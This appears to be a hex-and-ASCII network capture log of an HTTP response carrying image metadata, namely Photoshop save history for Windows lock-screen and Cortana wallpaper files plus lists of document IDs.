                                                                                                                                                                                    2023-01-05 07:58:10 UTC2223INData Raw: 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 31 32 54 31 35 3a 33 31 3a 31 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4f 66 66 69 63 65 5c 4f 66 66 69 63 65 2d 47 65 6e 65 72 61 6c 2d 53 70 6f 74 6c 69 67 68 74 5f 51 34 5c 43 72 6f 70 73 5c 4f 66 66 69 63 65 47 65 6e 65 72 69 63 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 37 35 37 35 38 37 36 33 5f 31 30 38 30 78 31 39 32 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 31 32 54 31 36 3a 30 38 3a 34 34 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4f 66 66 69 63 65 5c
                                                                                                                                                                                    Data Ascii: .psd saved&#xA;2017-05-12T15:31:15-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Office\Office-General-Spotlight_Q4\Crops\OfficeGeneric_GettyImages-175758763_1080x1920.psd saved&#xA;2017-05-12T16:08:44-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Office\
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2303INData Raw: 65 42 61 79 53 6f 75 74 68 41 66 72 69 63 61 5f 73 68 75 74 74 65 72 73 74 6f 63 6b 5f 35 37 33 34 39 35 33 30 37 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 32 35 54 32 32 3a 30 35 3a 35 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 44 72 6f 70 62 6f 78 20 28 41 71 75 65 6e 74 29 5c 52 68 79 73 5c 57 69 6e 64 6f 77 73 31 30 2d 4c 6f 63 6b 5c 4c 6f 63 6b 32 30 31 37 5f 42 61 74 63 68 35 5f 53 41 2d 41 46 5c 43 72 6f 70 73 5c 4c 6f 63 6b 32 30 31 37 2d 42 35 5f 41 46 5f 4e 69 67 68 74 43 61 70 65 74 6f 77 6e 53 6f 75 74 68 41 66 72 69 63 61 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 31 38 36 38 31 35 33 39 5f 31 30 38 30 78 31 39 32 30 2e 6a 70
                                                                                                                                                                                    Data Ascii: eBaySouthAfrica_shutterstock_573495307_1080x1920.jpg saved&#xA;2017-05-25T22:05:56-07:00&#x9;File C:\Users\v-lizagh\Dropbox (Aquent)\Rhys\Windows10-Lock\Lock2017_Batch5_SA-AF\Crops\Lock2017-B5_AF_NightCapetownSouthAfrica_GettyImages-518681539_1080x1920.jp
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2335INData Raw: 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4d 49 54 2d 42 61 63 6b 54 6f 53 63 68 6f 6f 6c 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 33 36 32 34 38 32 35 30 5f 31 30 38 30 78 31 39 32 30 45 36 34 30 41 36 44 32 36 45 32 34 30 46 39 38 41 30 46 34 37 42 35 45 39 33 41 43 46 33 32 45 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 37 2d 31 31 54 31 33 3a 31 31 3a 31 37 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d
                                                                                                                                                                                    Data Ascii: g\Adobe\Adobe Photoshop CC 2017\AutoRecover\_MIT-BackToSchool_GettyImages-136248250_1080x1920E640A6D26E240F98A0F47B5E93ACF32E.psb saved&#xA;2017-07-11T13:11:17-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1080x1920_Portrait.psd saved&#xA;2017-
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2375INData Raw: 6f 63 6b 32 30 31 37 5f 42 61 74 63 68 36 5c 5f 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4c 6f 63 6b 32 30 31 37 2d 42 36 5f 46 61 6c 6c 47 6c 65 6e 41 66 66 72 69 63 53 63 6f 74 6c 61 6e 64 5f 35 30 30 70 78 2d 31 37 33 33 31 38 34 37 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 30 32 54 31 36 3a 32 37 3a 31 32 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 37 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 46 30 31 39 34 34 45 44 31 42 37
                                                                                                                                                                                    Data Ascii: ock2017_Batch6\_CHOSEN\Crops\Lock2017-B6_FallGlenAffricScotland_500px-17331847_1080x1920.jpg saved&#xA;2017-08-02T16:27:12-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2017\AutoRecover\_Lockscreen_1080x1920_PortraitF01944ED1B7
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2542INData Raw: 36 30 31 33 31 32 39 5f 31 30 38 30 78 31 39 32 30 31 37 44 42 36 38 31 46 37 30 45 32 35 38 30 46 41 32 41 44 45 31 38 43 30 41 35 39 30 37 32 31 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 32 39 54 31 35 3a 34 34 3a 34 31 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 43 6f 72 74 61 6e 61 5c 4d 6f 74 69 76 61 74 69 6f 6e 61 6c 2d 43 61 6d 70 61 69 67 6e 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 51 75 6f 74 65 44 61 79 48 69 73 74 6f 72 79 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 34 36 36 30 31 33 31 32 39 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 32 39 54 31 35 3a 34 38 3a 32 31 2d
                                                                                                                                                                                    Data Ascii: 6013129_1080x192017DB681F70E2580FA2ADE18C0A590721.psb saved&#xA;2017-08-29T15:44:41-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Cortana\Motivational-Campaign\Chosen\Crops\QuoteDayHistory_GettyImages-466013129_1080x1920.jpg saved&#xA;2017-08-29T15:48:21-
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2708INData Raw: 65 64 26 23 78 41 3b 32 30 31 37 2d 31 30 2d 32 30 54 31 38 3a 30 38 3a 33 37 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 30 2d 32 30 54 31 38 3a 33 31 3a 33 31 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 30 2d 32 33 54 31 36 3a 32 31 3a 35 36 2d 30 37 3a 30 30 26 23 78
                                                                                                                                                                                    Data Ascii: ed&#xA;2017-10-20T18:08:37-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1080x1920_Portrait.psd saved&#xA;2017-10-20T18:31:31-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1080x1920_Portrait.psd saved&#xA;2017-10-23T16:21:56-07:00&#x
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2740INData Raw: 30 5f 50 6f 72 74 72 61 69 74 46 30 31 39 34 34 45 44 31 42 37 43 33 38 42 38 44 46 35 33 38 45 43 44 33 39 43 34 43 43 46 43 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 31 2d 32 38 54 31 34 3a 34 36 3a 32 37 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 32 2d 30 34 54 31 31 3a 32 35 3a 35 36 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 31 32 2d
                                                                                                                                                                                    Data Ascii: 0_PortraitF01944ED1B7C38B8DF538ECD39C4CCFC.psb saved&#xA;2017-11-28T14:46:27-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1080x1920_Portrait.psd saved&#xA;2017-12-04T11:25:56-08:00&#x9;File Lockscreen_1080x1920_Portrait.psd opened&#xA;2017-12-
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2748INData Raw: 31 37 3a 35 30 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 31 32 2d 31 34 54 31 32 3a 32 34 3a 30 31 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 32 2d 31 34 54 31 32 3a 32 34 3a 34 39 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65
                                                                                                                                                                                    Data Ascii: 17:50-08:00&#x9;File Lockscreen_1080x1920_Portrait.psd opened&#xA;2017-12-14T12:24:01-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1080x1920_Portrait.psd saved&#xA;2017-12-14T12:24:49-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2788INData Raw: 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 32 30 31 37 2d 42 31 30 5f 41 6d 75 73 65 6d 65 6e 74 50 61 72 6b 53 61 6e 74 61 4d 6f 6e 69 63 61 43 41 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 37 34 38 33 30 34 34 34 5f 31 30 38 30 78 31 39 32 30 44 42 34 30 41 31 42 43 33 42 46 33 34 45 34 33 32 39 34 45 38 30 31 31 41 43 38 42 31 37 34 33 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 31 2d 31 39 54 31 31 3a 34 33 3a 34 30 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 45 64 67 65 47 72 6f 77 74 68 49 6d 61 67 65 73 5c 4c 6f 63 6b 32 30 31 37 2d 42 61 74 63 68 31 30 5f 50 4f 41 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4c 6f 63 6b 32 30 31 37
                                                                                                                                                                                    Data Ascii: ecover\_Lock2017-B10_AmusementParkSantaMonicaCA_GettyImages-174830444_1080x1920DB40A1BC3BF34E43294E8011AC8B1743.psb saved&#xA;2018-01-19T11:43:40-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\BingEdgeGrowthImages\Lock2017-Batch10_POA\CHOSEN\Crops\Lock2017
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2804INData Raw: 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 32 2d 31 35 54 31 35 3a 31 35 3a 32 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 49 54 2d 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 5c 48 6f 6d 65 77 6f 72 6b 41 69 64 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4d 49 54 2d 49 6e 74 6c 5f 48 6f 6d 65 77 6f 72 6b 41 69 64 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 30 38 31 32 39 36 31 38 5f 31 30 38 30 78 31 39 32 30 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 32 2d 31 35 54 31 35 3a 31 36 3a 30 35 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 49 54 2d
                                                                                                                                                                                    Data Ascii: aved&#xA;2018-02-15T15:15:28-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MIT-International\HomeworkAid\CHOSEN\Crops\MIT-Intl_HomeworkAid_GettyImages-108129618_1080x1920.psd saved&#xA;2018-02-15T15:16:05-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MIT-
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2844INData Raw: 74 79 49 6d 61 67 65 73 2d 31 38 35 35 32 34 31 33 31 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 33 2d 30 37 54 31 38 3a 33 37 3a 32 33 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 57 69 6e 64 6f 77 73 5c 4d 4d 58 5c 42 61 74 63 68 33 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4d 4d 58 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 30 32 31 34 35 34 33 30 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 33 2d 30 37 54 31 38 3a 33 38 3a 30 37 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61
                                                                                                                                                                                    Data Ascii: tyImages-185524131_1080x1920.jpg saved&#xA;2018-03-07T18:37:23-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Windows\MMX\Batch3\CHOSEN\Crops\MMX_GettyImages-502145430_1080x1920.jpg saved&#xA;2018-03-07T18:38:07-08:00&#x9;File C:\Users\v-lizagh\AppData\Roa
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2901INData Raw: 32 34 44 30 37 41 30 39 36 33 42 39 41 39 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 32 33 46 31 34 36 30 30 44 42 32 36 30 33 32 42 45 35 34 46 39 42 39 44 43 35 37 34 32 37 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 32 34 36 38 34 30 31 32 35 36 35 41 34 42 39 37 36 45 37 37 43 45 46 35 34 32 44 33 32 44 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 32 35 31 32 31 33 43 30 42 38 34 32 33 43 37 31 42 34 32 31 43 39 41 38 34 43 34 31 34 39 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 32 35 34 43 31 33 31 30 42 38 30 38 46 32 42 33 31 46 39 33 46 31 33 46 45 31 36 42 38 30 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 32 35 46 46 42 30 32 45 39 44 31 39 34 38 38 35 46 31 43 43 36
                                                                                                                                                                                    Data Ascii: 24D07A0963B9A96</rdf:li> <rdf:li>023F14600DB26032BE54F9B9DC574277</rdf:li> <rdf:li>024684012565A4B976E77CEF542D32D0</rdf:li> <rdf:li>0251213C0B8423C71B421C9A84C4149E</rdf:li> <rdf:li>0254C1310B808F2B31F93F13FE16B804</rdf:li> <rdf:li>025FFB02E9D194885F1CC6
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3093INData Raw: 46 39 34 42 45 43 35 41 46 43 44 36 30 39 46 45 46 33 31 34 31 39 46 46 45 41 35 30 34 42 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 46 39 36 36 34 45 32 32 34 39 39 33 38 45 32 43 30 44 37 38 32 37 30 38 36 44 32 36 43 38 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 46 41 30 39 41 32 33 39 41 43 46 45 32 38 31 39 46 35 34 42 33 35 45 36 31 39 33 32 33 44 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 46 41 33 30 39 37 37 43 32 30 41 35 33 38 43 33 32 34 39 35 34 34 32 34 33 30 37 42 43 43 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 46 41 39 42 33 33 34 30 33 32 38 30 46 39 32 43 31 35 32 38 33 46 37 45 43 35 44 33 32 30 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 46 41 44 32 45
                                                                                                                                                                                    Data Ascii: F94BEC5AFCD609FEF31419FFEA504B0</rdf:li> <rdf:li>0F9664E2249938E2C0D7827086D26C83</rdf:li> <rdf:li>0FA09A239ACFE2819F54B35E619323DE</rdf:li> <rdf:li>0FA30977C20A538C324954424307BCC6</rdf:li> <rdf:li>0FA9B33403280F92C15283F7EC5D320F</rdf:li> <rdf:li>0FAD2E
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3116INData Raw: 35 32 45 39 45 38 35 45 36 46 34 45 37 42 32 33 43 35 38 46 46 43 39 35 33 38 39 36 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 35 42 36 34 39 37 33 46 39 30 30 30 33 30 46 43 31 35 37 35 43 42 31 37 38 45 38 34 34 36 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 35 42 42 35 39 41 45 32 41 33 33 36 30 30 35 41 30 32 38 32 37 38 37 41 38 44 38 37 36 43 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 35 43 42 38 33 46 32 32 43 32 42 37 38 38 45 34 36 41 33 38 39 45 30 42 37 45 44 35 37 45 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 35 43 43 30 45 33 31 46 30 32 32 36 38 36 42 46 42 31 30 30 46 41 36 36 32 34 45 31 36 31 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 31 35 43 43 43 42 35 32
                                                                                                                                                                                    Data Ascii: 52E9E85E6F4E7B23C58FFC953896B</rdf:li> <rdf:li>15B64973F900030FC1575CB178E84461</rdf:li> <rdf:li>15BB59AE2A336005A0282787A8D876CA</rdf:li> <rdf:li>15CB83F22C2B788E46A389E0B7ED57EB</rdf:li> <rdf:li>15CC0E31F022686BFB100FA6624E1616</rdf:li> <rdf:li>15CCCB52
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3156INData Raw: 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 33 39 35 35 37 37 44 35 43 43 38 35 35 46 32 44 37 31 37 37 33 42 41 41 45 44 32 42 33 38 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 33 42 39 32 35 33 41 39 30 39 30 35 31 36 35 46 41 38 43 41 32 34 42 44 36 41 38 39 44 32 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 33 42 45 34 42 39 42 43 38 36 36 46 30 37 34 41 34 38 33 31 45 32 35 37 43 46 30 30 34 43 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 33 43 31 42 39 32 36 45 33 34 35 32 45 42 36 37 30 42 36 41 42 36 34 46 35 42 35 31 46 46 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 33 43 38 39 45 39 34 31 36 39 32 32 38 36 32 30 42 32 37 44 44 39 36 42 32 35 45 35 46 44 41 3c 2f 72 64 66 3a 6c 69 3e 20
                                                                                                                                                                                    Data Ascii: :li> <rdf:li>2395577D5CC855F2D71773BAAED2B386</rdf:li> <rdf:li>23B9253A90905165FA8CA24BD6A89D25</rdf:li> <rdf:li>23BE4B9BC866F074A4831E257CF004C3</rdf:li> <rdf:li>23C1B926E3452EB670B6AB64F5B51FFB</rdf:li> <rdf:li>23C89E94169228620B27DD96B25E5FDA</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3188INData Raw: 3c 72 64 66 3a 6c 69 3e 32 46 44 45 38 45 30 37 46 45 42 44 37 31 36 39 44 37 45 32 38 46 46 43 39 30 44 42 36 41 31 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 32 46 46 31 42 31 41 46 32 43 35 30 36 42 46 35 39 31 35 38 42 34 37 35 31 34 38 35 46 37 43 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 30 30 31 44 41 32 32 43 42 41 36 32 37 35 41 38 41 30 39 33 37 32 45 31 42 41 46 43 46 44 35 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 30 30 32 43 39 45 42 37 46 33 34 41 46 46 42 39 31 34 31 34 37 30 46 31 45 42 45 38 35 42 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 30 30 33 42 36 37 37 45 30 32 31 42 45 30 37 44 32 45 43 33 34 38 35 45 34 44 42 31 45 41 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a
                                                                                                                                                                                    Data Ascii: <rdf:li>2FDE8E07FEBD7169D7E28FFC90DB6A15</rdf:li> <rdf:li>2FF1B1AF2C506BF59158B4751485F7C5</rdf:li> <rdf:li>3001DA22CBA6275A8A09372E1BAFCFD5</rdf:li> <rdf:li>3002C9EB7F34AFFB9141470F1EBE85B2</rdf:li> <rdf:li>3003B677E021BE07D2EC3485E4DB1EAD</rdf:li> <rdf:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3212INData Raw: 64 66 3a 6c 69 3e 33 36 30 36 39 44 39 33 44 32 43 32 42 34 35 38 35 30 42 32 37 42 33 30 44 42 46 41 30 42 35 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 36 32 37 44 41 45 42 36 37 44 37 44 33 46 31 30 32 44 45 45 43 31 42 43 41 38 45 39 34 36 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 36 33 43 46 43 36 35 43 41 45 39 45 34 36 45 45 46 36 30 36 43 37 39 46 41 42 30 43 38 38 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 36 34 31 38 39 31 34 32 32 43 33 46 36 43 37 35 30 32 41 41 43 43 45 42 42 38 39 42 38 34 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 33 36 35 30 32 38 36 36 36 38 44 33 34 37 34 45 38 41 34 31 38 39 44 31 35 38 38 46 32 35 39 41 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: df:li>36069D93D2C2B45850B27B30DBFA0B51</rdf:li> <rdf:li>3627DAEB67D7D3F102DEEC1BCA8E9468</rdf:li> <rdf:li>363CFC65CAE9E46EEF606C79FAB0C88D</rdf:li> <rdf:li>3641891422C3F6C7502AACCEBB89B84B</rdf:li> <rdf:li>3650286668D3474E8A4189D1588F259A</rdf:li> <rdf:li
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3237INData Raw: 32 41 35 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 33 39 32 33 44 41 42 45 32 41 39 32 45 35 46 33 43 34 45 36 35 45 34 41 38 45 35 44 43 37 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 33 39 34 35 42 43 46 42 33 43 45 33 34 37 41 35 37 42 35 43 43 46 43 34 37 35 38 43 38 36 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 33 41 36 41 33 35 42 36 30 46 31 41 46 43 44 46 44 34 33 43 34 44 30 42 36 41 41 41 46 46 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 33 41 46 38 36 45 46 34 42 46 42 45 37 34 38 30 45 43 44 41 35 30 36 36 43 37 39 45 34 30 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 34 33 41 46 42 35 35 45 38 36 41 42 46 31 39 34 45 32 39 31 35 33 35 45 30 42 42 34 42 42 39 32 3c
                                                                                                                                                                                    Data Ascii: 2A58</rdf:li> <rdf:li>43923DABE2A92E5F3C4E65E4A8E5DC7D</rdf:li> <rdf:li>43945BCFB3CE347A57B5CCFC4758C867</rdf:li> <rdf:li>43A6A35B60F1AFCDFD43C4D0B6AAAFF9</rdf:li> <rdf:li>43AF86EF4BFBE7480ECDA5066C79E408</rdf:li> <rdf:li>43AFB55E86ABF194E291535E0BB4BB92<
                                                                                                                                                                                    2023-01-05 07:58:10 UTC3269INData Raw: 32 43 37 31 32 43 36 44 42 39 32 32 39 45 38 32 30 35 33 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 30 37 32 46 37 41 30 35 33 45 35 42 43 35 34 37 38 43 37 38 36 39 43 44 31 36 42 41 35 35 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 30 37 36 45 43 45 37 34 36 35 44 45 31 42 41 43 35 38 45 44 38 34 31 43 36 32 36 46 46 35 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 30 37 38 34 46 31 33 33 42 38 35 41 37 46 37 31 43 38 30 41 43 35 34 36 31 43 44 43 38 36 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 30 37 46 43 42 44 37 39 30 45 32 37 31 30 35 32 32 42 41 32 35 46 38 37 38 31 38 33 44 36 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 35 30 38 37 45 37 37 31 41 39 46 38 32 37 32 39 44
